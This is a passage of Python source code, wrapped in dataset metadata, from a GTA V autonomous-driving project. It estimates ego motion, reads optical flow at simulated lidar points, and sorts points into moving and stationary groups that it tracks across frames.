self.dt_in_game\r\n acc = self.acc\r\n speed_last = self.speed_now - acc * dt_in_game\r\n\r\n if self.delta_yaw != 0:\r\n # simple ver. only using the yaw to estimate, in camera coord: x,y,z refer to left, up, front\r\n horizontal_turn_radius = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) / self.delta_yaw\r\n self.move_z = horizontal_turn_radius * math.sin(self.delta_yaw) * math.cos(self.pitch)\r\n self.move_x = horizontal_turn_radius * (1 - math.cos(self.delta_yaw))\r\n self.move_y = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.sin(self.pitch)\r\n else:\r\n self.move_z = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.cos(self.pitch)\r\n self.move_x = 0\r\n self.move_y = (speed_last * dt_in_game + acc * dt_in_game ** 2 / 2) * math.sin(self.pitch)\r\n\r\n\r\n\r\n def run(self):\r\n if self.initialized == 0:\r\n if self.depth_image_now is not None:\r\n self.initialized = 1\r\n self.depth_image_last = self.depth_image_now\r\n return None, None, None, None, None, None, None, None, None\r\n\r\n\r\n\r\n y_sample = self.y_sample\r\n x_sample = self.x_sample\r\n y_sample_deg = self.y_sample_deg\r\n x_sample_deg = self.x_sample_deg\r\n upper_lim = self.upper_lim\r\n depth_image_now = self.depth_image_now\r\n depth_image_last = self.depth_image_last\r\n lidar_range = self.lidar_range\r\n focus = self.focus\r\n h_sample = self.h_sample\r\n v_sample = self.v_sample\r\n dt_in_game = self.dt_in_game\r\n\r\n ground_marker = self.ground_marker\r\n\r\n m_candidate_coord_last = self.m_candidate_coord_last\r\n m_candidate2_coord_last = self.m_candidate2_coord_last\r\n m_tracked_coord_last = self.m_tracked_coord_last\r\n\r\n m_tracked_spd_last = self.m_tracked_spd_last\r\n m_candidate_spd_last = self.m_candidate_spd_last\r\n m_candidate2_spd_last = self.m_candidate2_spd_last\r\n\r\n s_candidate_coord_last = self.s_candidate_coord_last\r\n s_candidate2_coord_last = self.s_candidate2_coord_last\r\n s_tracked_coord_last = self.s_tracked_coord_last\r\n\r\n ### main calculation starts here\r\n edge_y, edge_x = edge_detect(depth_image_last)\r\n\r\n row_lidar, col_lidar = (np.indices((y_sample, x_sample))).astype('float32')\r\n\r\n # find lidar theta phi\r\n theta, phi = find_lidar_theta_phi_from_coord_Ma(row_lidar, col_lidar, x_sample, x_sample_deg, y_sample_deg,\r\n upper_lim)\r\n\r\n # polar to cartesian camera coord\r\n depth_x, depth_y, depth_z = polar_to_cartesian(depth_image_now, theta, phi)\r\n\r\n # cartesian to image coord\r\n reference_y = (v_sample - 1) / 2 - depth_y * focus / depth_z\r\n reference_x = (h_sample - 1) / 2 - depth_x * focus / depth_z\r\n\r\n # read optical flow to find where the last positions were\r\n magnitude = self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)]\r\n direction = self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)]\r\n\r\n # use more samples to read optical flow\r\n #magnitude = (self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)] +\r\n # self.magnitude_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)+1] +\r\n # self.magnitude_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)] +\r\n # self.magnitude_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)+1]) / 4\r\n#\r\n #direction = (self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)] +\r\n # self.direction_image[np.round(reference_y).astype(int), np.round(reference_x).astype(int)+1] +\r\n # self.direction_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)] +\r\n # self.direction_image[np.round(reference_y).astype(int)+1, np.round(reference_x).astype(int)+1]) / 4\r\n\r\n extend_row = magnitude * np.sin(direction / 180 * np.pi)\r\n extend_col = magnitude * np.cos(direction / 180 * np.pi)\r\n\r\n row_image_last = reference_y - extend_row # row and col not rounded yet\r\n col_image_last = reference_x - extend_col\r\n\r\n # for check_flow(), debug\r\n self.depth_x_now = depth_x\r\n self.depth_y_now = depth_y\r\n self.depth_z_now = depth_z\r\n self.row_image_now = reference_y\r\n self.col_image_now = reference_x\r\n self.mag_read = magnitude\r\n self.direc_read = direction\r\n\r\n # find lidar theta phi from those positions in image\r\n pixel_v_refer2center = row_image_last - v_sample // 2 + 0.5 # -: above, +: under\r\n pixel_h_refer2center = h_sample // 2 - col_image_last - 0.5 # +: left, -: right\r\n\r\n theta_last = np.arctan(pixel_v_refer2center / np.sqrt(focus ** 2 + pixel_h_refer2center ** 2)) + np.pi / 2\r\n phi_last = np.arctan(pixel_h_refer2center / focus)\r\n\r\n\r\n # find possible nearest upper left lidar point from phi and theta, this is one of the vertices for interpolation\r\n row_lidar_up_raw = ((theta_last / np.pi * 180 - upper_lim) // y_sample_deg).astype(int)\r\n\r\n col_lidar_left_raw = np.zeros_like(col_lidar)\r\n col_lidar_left_raw = np.where(phi_last / np.pi * 180 >= x_sample_deg / 2, # left\r\n x_sample // 2 - (phi_last / np.pi * 180 - x_sample_deg / 2) // x_sample_deg - 2,\r\n col_lidar_left_raw)\r\n\r\n col_lidar_left_raw = np.where(phi_last / np.pi * 180 <= -x_sample_deg / 2, # right\r\n x_sample // 2 + (-phi_last / np.pi * 180 - x_sample_deg / 2) // x_sample_deg,\r\n col_lidar_left_raw)\r\n\r\n col_lidar_left_raw = np.where((phi_last / np.pi * 180 < x_sample_deg / 2) &\r\n (phi_last / np.pi * 180 > -x_sample_deg / 2), # near center\r\n x_sample // 2 - 1,\r\n col_lidar_left_raw)\r\n col_lidar_left_raw = col_lidar_left_raw.astype(int)\r\n\r\n # change those points which are out of lidar FOV into correct range. Theirs result cant be trusted.\r\n # All points will be interpolated due to matrix calculation, but results from bad points will be excluded later\r\n row_lidar_up = np.where(row_lidar_up_raw < 0, 0, row_lidar_up_raw)\r\n row_lidar_up = np.where(row_lidar_up + 1 > y_sample - 1, y_sample - 2, row_lidar_up)\r\n col_lidar_left = np.where(col_lidar_left_raw < 0, 0, col_lidar_left_raw)\r\n col_lidar_left = np.where(col_lidar_left + 1 > x_sample - 1, x_sample - 2, col_lidar_left)\r\n\r\n # the other vertices for interpolation\r\n row_lidar_down = row_lidar_up + 1\r\n col_lidar_right = col_lidar_left + 1\r\n\r\n # read depth of each vertices\r\n depth_ul = depth_image_last[row_lidar_up, col_lidar_left]\r\n depth_ur = depth_image_last[row_lidar_up, col_lidar_right]\r\n depth_dl = depth_image_last[row_lidar_down, col_lidar_left]\r\n depth_dr = depth_image_last[row_lidar_down, col_lidar_right]\r\n\r\n # interpolation\r\n theta_last_up, phi_last_left = \\\r\n find_lidar_theta_phi_from_coord_Ma(row_lidar_up, col_lidar_left, x_sample, x_sample_deg, y_sample_deg,\r\n upper_lim)\r\n theta_last_down, phi_last_right = \\\r\n find_lidar_theta_phi_from_coord_Ma(row_lidar_down, col_lidar_right, x_sample, x_sample_deg, y_sample_deg,\r\n upper_lim)\r\n\r\n depth_inter_u, sensitivity_up = interpolation(phi_last_left, phi_last, phi_last_right, depth_ul, depth_ur)\r\n depth_inter_d, sensitivity_down = interpolation(phi_last_left, phi_last, phi_last_right, depth_dl, depth_dr)\r\n\r\n depth_inter, sensitivity_center = interpolation(theta_last_up, theta_last, theta_last_down, depth_inter_u,\r\n depth_inter_d)\r\n\r\n # to cartesian\r\n depth_x_last, depth_y_last, depth_z_last = polar_to_cartesian(depth_inter, theta_last, phi_last)\r\n\r\n # make indices for good point!\r\n obj_check1 = edge_x[row_lidar_up, col_lidar_left] * edge_x[row_lidar_up, col_lidar_right]\r\n obj_check2 = edge_x[row_lidar_down, col_lidar_left] * edge_x[row_lidar_down, col_lidar_right]\r\n obj_check3 = edge_y[row_lidar_up, col_lidar_left] * edge_y[row_lidar_down, col_lidar_left]\r\n obj_check4 = edge_y[row_lidar_up, col_lidar_right] * edge_y[row_lidar_down, col_lidar_right]\r\n\r\n depth_check1 = depth_image_last[row_lidar_up, col_lidar_left]\r\n depth_check2 = depth_image_last[row_lidar_up, col_lidar_right]\r\n depth_check3 = depth_image_last[row_lidar_down, col_lidar_left]\r\n depth_check4 = depth_image_last[row_lidar_down, col_lidar_right]\r\n\r\n index_good_points = np.where((depth_image_now < lidar_range) & # current points inside lidar range\r\n # current points is not ground\r\n (ground_marker == 0) &\r\n # 4 raw vertices inside lidar FOV\r\n (row_lidar_up_raw >= 0) &\r\n (row_lidar_up_raw + 1 <= y_sample - 1) &\r\n (col_lidar_left_raw >= 0) &\r\n (col_lidar_left_raw + 1 <= x_sample - 1) &\r\n # 4 raw vertices located on the same surface of a object\r\n (obj_check1 > -1) & (obj_check2 > -1) & (obj_check3 > -1) & (obj_check4 > -1) &\r\n # 4 raw vertices inside lidar FOV\r\n (depth_check1 < lidar_range) & (depth_check2 < lidar_range) &\r\n (depth_check3 < lidar_range) & (depth_check4 < lidar_range))\r\n\r\n # take out those good points.\r\n depth_x_last = np.expand_dims(depth_x_last[index_good_points], axis=1)\r\n depth_y_last = np.expand_dims(depth_y_last[index_good_points], axis=1)\r\n depth_z_last = np.expand_dims(depth_z_last[index_good_points], axis=1)\r\n points_last = np.concatenate((depth_x_last, depth_y_last, depth_z_last), axis=1) # refer to camera coord last\r\n\r\n depth_x = np.expand_dims(depth_x[index_good_points], axis=1)\r\n depth_y = np.expand_dims(depth_y[index_good_points], axis=1)\r\n depth_z = np.expand_dims(depth_z[index_good_points], axis=1)\r\n points_now = np.concatenate((depth_x, depth_y, depth_z), axis=1) # refer to camera coord now\r\n # (camera coord move in world coord)\r\n # change the coord system time last to time now by using self movement\r\n # ie, points_last refer to camera coord now\r\n move_matrix = np.array([self.move_x, self.move_y, self.move_z])\r\n rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(self.delta_pitch, self.delta_roll,\r\n self.delta_yaw)\r\n\r\n points_last_new_coord = coords_ro_move(points_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='move_first')\r\n\r\n # speed relative to ground in current camera coord\r\n spd_xyz = (points_now - points_last_new_coord) / dt_in_game\r\n spd_mag = np.sqrt(np.sum(spd_xyz ** 2, axis=1))\r\n\r\n # build united sensitivity(of interpolation) matrix\r\n sensitivity_up = np.expand_dims(sensitivity_up, axis=2)\r\n sensitivity_down = np.expand_dims(sensitivity_down, axis=2)\r\n sensitivity_center = np.expand_dims(sensitivity_center, axis=2)\r\n sensitivity = np.concatenate((sensitivity_up, sensitivity_down, sensitivity_center), axis=2)\r\n\r\n # adaptive threshold,\r\n # m for detection moving points,\r\n # s for detection stationary points,\r\n # t for tracking those points from last points cloud\r\n threshold_m = depth_image_last * 0.05 + np.max(sensitivity, axis=2) * 0.95 # spd threshold\r\n threshold_s = threshold_m / 1 # spd threshold\r\n threshold_m_t = depth_image_last * 0.015 + np.max(sensitivity, axis=2) * 0.05 # position threshold\r\n threshold_s_t = depth_image_last * 0.015 + np.max(sensitivity, axis=2) * 0.05 # position threshold\r\n threshold_m_t_spd = 1 + depth_image_last * 0.05 # + np.max(sensitivity, axis=2) * 0.95 # spd threshold\r\n\r\n threshold_m = threshold_m[index_good_points]\r\n threshold_s = threshold_s[index_good_points]\r\n threshold_m_t = threshold_m_t[index_good_points]\r\n threshold_m_t_spd = threshold_m_t_spd[index_good_points]\r\n threshold_s_t = threshold_s_t[index_good_points]\r\n\r\n # take out the stationary points' now and last position refer to camera coord last\r\n stationary_index = np.where(spd_mag < threshold_s)\r\n s_points_now = points_now[stationary_index]\r\n s_points_last = points_last[stationary_index]\r\n threshold_s_t = threshold_s_t[stationary_index]\r\n lack = spd_mag - threshold_s\r\n t0 = time.time()\r\n # pairwise distance of each point in s_points_last to each point in last classified clouds (in camera coord last)\r\n spl_to_st = threshold_s_t + 1\r\n spl_to_sc2 = threshold_s_t + 1\r\n spl_to_sc = threshold_s_t + 1\r\n\r\n if s_tracked_coord_last.size !=0:\r\n spl_to_st = distance.cdist(s_points_last, s_tracked_coord_last, 'euclidean')\r\n # min. distance of each point in s_points_last to each point in last classified clouds\r\n spl_to_st = np.min(spl_to_st, axis=1)\r\n\r\n if s_candidate2_coord_last.size !=0:\r\n spl_to_sc2 = distance.cdist(s_points_last, s_candidate2_coord_last, 'euclidean')\r\n spl_to_sc2 = np.min(spl_to_sc2, axis=1)\r\n\r\n if s_candidate_coord_last.size !=0:\r\n spl_to_sc = distance.cdist(s_points_last, s_candidate_coord_last, 'euclidean')\r\n spl_to_sc = np.min(spl_to_sc, axis=1)\r\n\r\n # classify stationary points now (s_points_now) into 3 group\r\n # below, use bool index instead np.where for simplicity\r\n # s_tracked_index = np.where((spl_to_st < threshold_s_t) | (spl_to_sc2 < threshold_s_t))\r\n s_tracked_index = (spl_to_st < threshold_s_t) | (spl_to_sc2 < threshold_s_t)\r\n s_tracked_coord = s_points_now[s_tracked_index,:]\r\n\r\n #s_rest_index = np.where((spl_to_st >= threshold_s_t) & (spl_to_sc2 >= threshold_s_t))\r\n s_rest_index = ~s_tracked_index\r\n s_points_now_rest = s_points_now[s_rest_index,:]\r\n spl_to_sc_rest = spl_to_sc[s_rest_index]\r\n threshold_s_t = threshold_s_t[s_rest_index]\r\n\r\n # s_candidate2_index = np.where(spl_to_sc_rest < threshold_s_t)\r\n s_candidate2_index = (spl_to_sc_rest < threshold_s_t)\r\n s_candidate2_coord = s_points_now_rest[s_candidate2_index,:]\r\n\r\n #s_candidate_index = np.where(spl_to_sc_rest >= threshold_s_t)\r\n s_candidate_index = ~s_candidate2_index\r\n s_candidate_coord = s_points_now_rest[s_candidate_index,:]\r\n\r\n ## below for moving points\r\n # take out the moving points' now and last position refer to camera coord last\r\n moving_index = np.where(spd_mag > threshold_m)\r\n m_points_now = points_now[moving_index]\r\n m_spd_xyz = spd_xyz[moving_index]\r\n m_points_last = points_last[moving_index]\r\n threshold_m_t = threshold_m_t[moving_index]\r\n threshold_m_t_spd = threshold_m_t_spd[moving_index]\r\n excess = spd_mag - threshold_m\r\n\r\n # change current coord for last spd, so it can compare with current spd\r\n move_matrix = np.array([0,0,0])\r\n m_tracked_spd_last = coords_ro_move(m_tracked_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='move_first')\r\n m_candidate2_spd_last = coords_ro_move(m_candidate2_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='move_first')\r\n m_candidate_spd_last = coords_ro_move(m_candidate_spd_last, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='move_first')\r\n\r\n # pairwise distance of each point in m_points_last/m_spd_xyz to each point in last classified clouds (in camera coord last)\r\n # different than what for tracking stationary point, for moving points speed is also checked, pipe line below is a little different\r\n threshold_m_t = np.expand_dims(threshold_m_t, axis=1)\r\n threshold_m_t_spd = np.expand_dims(threshold_m_t_spd, axis=1)\r\n mpl_to_mt = threshold_m_t + 1\r\n mpl_to_mc2 = threshold_m_t + 1\r\n mpl_to_mc = threshold_m_t + 1\r\n mps_to_mt = threshold_m_t_spd + 1\r\n mps_to_mc2 = threshold_m_t_spd + 1\r\n mps_to_mc = threshold_m_t_spd + 1\r\n\r\n if m_tracked_coord_last.size !=0:\r\n mpl_to_mt = distance.cdist(m_points_last, m_tracked_coord_last, 'euclidean')\r\n mps_to_mt = distance.cdist(m_spd_xyz, m_tracked_spd_last, 'euclidean')\r\n\r\n if m_candidate2_coord_last.size !=0:\r\n mpl_to_mc2 = distance.cdist(m_points_last, m_candidate2_coord_last, 'euclidean')\r\n mps_to_mc2 = distance.cdist(m_spd_xyz, m_candidate2_spd_last, 'euclidean')\r\n\r\n if m_candidate_coord_last.size !=0:\r\n mpl_to_mc = distance.cdist(m_points_last, m_candidate_coord_last, 'euclidean')\r\n mps_to_mc = distance.cdist(m_spd_xyz, m_candidate_spd_last, 'euclidean')\r\n\r\n # classify stationary points now (s_points_now) into 3 group\r\n m_tracked_index1 = (mpl_to_mt < threshold_m_t) & (mps_to_mt < threshold_m_t_spd)\r\n m_tracked_index1 = np.max(m_tracked_index1, axis=1)\r\n m_tracked_index2 = (mpl_to_mc2 < threshold_m_t) & (mps_to_mc2 < threshold_m_t_spd)\r\n m_tracked_index2 = np.max(m_tracked_index2, axis=1)\r\n m_tracked_index = m_tracked_index1 | m_tracked_index2\r\n\r\n m_tracked_coord = m_points_now[m_tracked_index,:]\r\n m_tracked_spd = m_spd_xyz[m_tracked_index,:]\r\n\r\n m_rest_index = ~m_tracked_index\r\n m_points_now_rest = m_points_now[m_rest_index,:]\r\n m_spd_xyz_rest = m_spd_xyz[m_rest_index,:]\r\n mpl_to_mc_rest = mpl_to_mc[m_rest_index]\r\n mps_to_mc_rest = mps_to_mc[m_rest_index]\r\n threshold_m_t = threshold_m_t[m_rest_index,:]\r\n threshold_m_t_spd = threshold_m_t_spd[m_rest_index,:]\r\n\r\n m_candidate2_index = (mpl_to_mc_rest < threshold_m_t) & (mps_to_mc_rest < threshold_m_t_spd)\r\n m_candidate2_index = np.max(m_candidate2_index, axis=1)\r\n m_candidate2_coord = m_points_now_rest[m_candidate2_index,:]\r\n m_candidate2_spd = m_spd_xyz_rest[m_candidate2_index,:]\r\n\r\n m_candidate_index = ~m_candidate2_index\r\n m_candidate_coord = m_points_now_rest[m_candidate_index,:]\r\n m_candidate_spd = m_spd_xyz_rest[m_candidate_index,:]\r\n print('tracking takes', time.time() -t0)\r\n # add markers to show image\r\n marker = None\r\n if self.plot != 0:\r\n row = np.expand_dims(reference_y[index_good_points], axis=1)\r\n col = np.expand_dims(reference_x[index_good_points], axis=1)\r\n reference = np.concatenate((col, row), axis=1)\r\n\r\n s_reference = reference[stationary_index]\r\n marker_s_tracked = s_reference[s_tracked_index]\r\n s_reference_rest = s_reference[s_rest_index]\r\n\r\n marker_s_candidate2 = s_reference_rest[s_candidate2_index]\r\n marker_s_candidate = s_reference_rest[s_candidate_index]\r\n\r\n m_reference = reference[moving_index]\r\n marker_m_tracked = m_reference[m_tracked_index]\r\n m_reference_rest = m_reference[m_rest_index]\r\n\r\n marker_m_candidate2 = m_reference_rest[m_candidate2_index]\r\n marker_m_candidate = m_reference_rest[m_candidate_index]\r\n\r\n marker = {'marker_tracked': np.array(marker_m_tracked),\r\n 'marker_candidate2': np.array(marker_m_candidate2),\r\n 'marker_candidate': np.array(marker_m_candidate),\r\n 'marker_s_tracked': np.array(marker_s_tracked),\r\n 'marker_s_candidate2': np.array(marker_s_candidate2),\r\n 'marker_s_candidate': np.array(marker_s_candidate)}\r\n\r\n esti_coord = None\r\n # add more data\r\n if self.plot == 2:\r\n s_tracked_coord_e = s_points_last[s_tracked_index]\r\n m_tracked_coord_e = m_points_last[m_tracked_index]\r\n\r\n move_matrix = np.array([-self.move_x, -self.move_y, -self.move_z])\r\n rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(-self.delta_pitch, -self.delta_roll,-self.delta_yaw)\r\n points_last0 = coords_ro_move(points_now, move_matrix, rotation_matrix_p_r, rotation_matrix_y, mode='turn_first')\r\n\r\n s_points_last0 = points_last0[np.where(stationary_index)]\r\n m_points_last0 = points_last0[np.where(moving_index)]\r\n\r\n s_tracked_coord_e0 = s_points_last0[s_tracked_index]\r\n m_tracked_coord_e0 = m_points_last0[m_tracked_index]\r\n\r\n esti_coord = {'tracked_coord_e': np.array(m_tracked_coord_e),\r\n 'tracked_coord_e0': np.array(m_tracked_coord_e0),\r\n 's_tracked_coord_e': np.array(s_tracked_coord_e),\r\n 's_tracked_coord_e0': np.array(s_tracked_coord_e0)}\r\n\r\n self.m_tracked_coord_last = m_tracked_coord\r\n self.m_tracked_spd_last = m_tracked_spd\r\n self.m_candidate_coord_last = m_candidate_coord\r\n self.m_candidate_spd_last = m_candidate_spd\r\n self.m_candidate2_coord_last = m_candidate2_coord\r\n self.m_candidate2_spd_last = m_candidate2_spd\r\n\r\n self.s_tracked_coord_last = s_tracked_coord\r\n self.s_candidate_coord_last = s_candidate_coord\r\n self.s_candidate2_coord_last = s_candidate2_coord\r\n\r\n\r\n self.depth_image_last = self.depth_image_now\r\n\r\n # return the current data actually\r\n return m_tracked_spd, self.m_tracked_coord_last, self.s_tracked_coord_last, excess, lack, \\\r\n reference_y, reference_x, marker, esti_coord\r\n\r\n\r\n\r\n # debug function\r\n def check_flow(self):\r\n move_matrix = np.array([-self.move_x, -self.move_y, -self.move_z])\r\n rotation_matrix_p_r, rotation_matrix_y = build_roatation_matrix_3D(-self.delta_pitch, -self.delta_roll,\r\n -self.delta_yaw)\r\n\r\n depth_x = np.expand_dims(self.depth_x_now, axis=2)\r\n depth_y = np.expand_dims(self.depth_y_now, axis=2)\r\n depth_z = np.expand_dims(self.depth_z_now, axis=2)\r\n all_point_now = np.concatenate((depth_x,depth_y,depth_z), axis=2).reshape(-1,3)\r\n all_points_last_esti = coords_ro_move(all_point_now, move_matrix, rotation_matrix_p_r, rotation_matrix_y,\r\n mode='turn_first')\r\n\r\n depth_x_last = all_points_last_esti[:,0].reshape(self.y_sample, self.x_sample)\r\n depth_y_last = all_points_last_esti[:,1].reshape(self.y_sample, self.x_sample)\r\n depth_z_last = all_points_last_esti[:,2].reshape(self.y_sample, self.x_sample)\r\n # cartesian to image coord\r\n row_image_last0 = (self.v_sample - 1) / 2 - depth_y_last * self.focus / depth_z_last\r\n col_image_last0 = (self.h_sample - 1) / 2 - depth_x_last * self.focus / depth_z_last\r\n\r\n flow_y = self.row_image_now - row_image_last0\r\n flow_x = self.col_image_now - col_image_last0\r\n\r\n mag_esti = np.sqrt(flow_x ** 2 + flow_y ** 2)\r\n mag_esti[np.where(mag_esti == 0)] = 1\r\n direc_esti = np.where(flow_y >= 0,\r\n np.arccos(flow_x / mag_esti) / np.pi * 180,\r\n np.arccos(- flow_x / mag_esti) / np.pi * 180 + 180)\r\n\r\n\r\n gamma = 3\r\n hsv = np.zeros((self.y_sample, self.x_sample, 3))\r\n hsv[..., 1] = 255\r\n hsv[..., 0] = self.direc_read / 2\r\n hsv[..., 2] = cv2.normalize(self.mag_read, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv[..., 2] = 255 * hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n image_flow_cut = cv2.cvtColor(hsv, cv2.COLOR_HSV2RGB)\r\n\r\n hsv_0 = np.zeros((mag_esti.shape[0], mag_esti.shape[1], 3))\r\n hsv_0[..., 1] = 255\r\n hsv_0[..., 0] = direc_esti / 2\r\n hsv_0[..., 2] = cv2.normalize(mag_esti, None, 0, 1, cv2.NORM_MINMAX)\r\n hsv_0[..., 2] = 255 * hsv_0[..., 2] ** (1 / gamma)\r\n hsv_0 = np.uint8(hsv_0)\r\n image_flow_cut_0 = cv2.cvtColor(hsv_0, cv2.COLOR_HSV2RGB)\r\n\r\n return image_flow_cut, image_flow_cut_0, self.mag_read, mag_esti, self.direc_read, direc_esti\r\n\r\n\r\n\r\n\r\n", "repo_name": "Dongpeng-Ding/GTAV-Autonomy-", "sub_path": "Movement_check3.py", "file_name": "Movement_check3.py", "file_ext": "py", "file_size_in_byte": 28315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 101, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 101, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 102, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 103, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 105, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 107, "usage_type": "call"}, {"api_name": "Lidar_tools.edge_detect", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.indices", "line_number": 150, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 153, "usage_type": "call"}, {"api_name": "Lidar_tools.polar_to_cartesian", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 197, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 205, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 210, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 213, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 214, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 221, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 224, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 238, "usage_type": "call"}, {"api_name": "Lidar_tools.find_lidar_theta_phi_from_coord_Ma", "line_number": 241, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 244, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 245, "usage_type": "call"}, {"api_name": "Lidar_tools.interpolation", "line_number": 247, "usage_type": "call"}, {"api_name": "Lidar_tools.polar_to_cartesian", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 280, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 291, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.build_roatation_matrix_3D", "line_number": 292, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 325, "usage_type": "call"}, {"api_name": "time.time", "line_number": 330, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 337, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 342, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 342, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 346, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 346, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 380, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 381, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 383, "usage_type": "call"}, {"api_name": "Lidar_tools_AG.coords_ro_move", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 391, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 400, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 400, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 401, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 401, 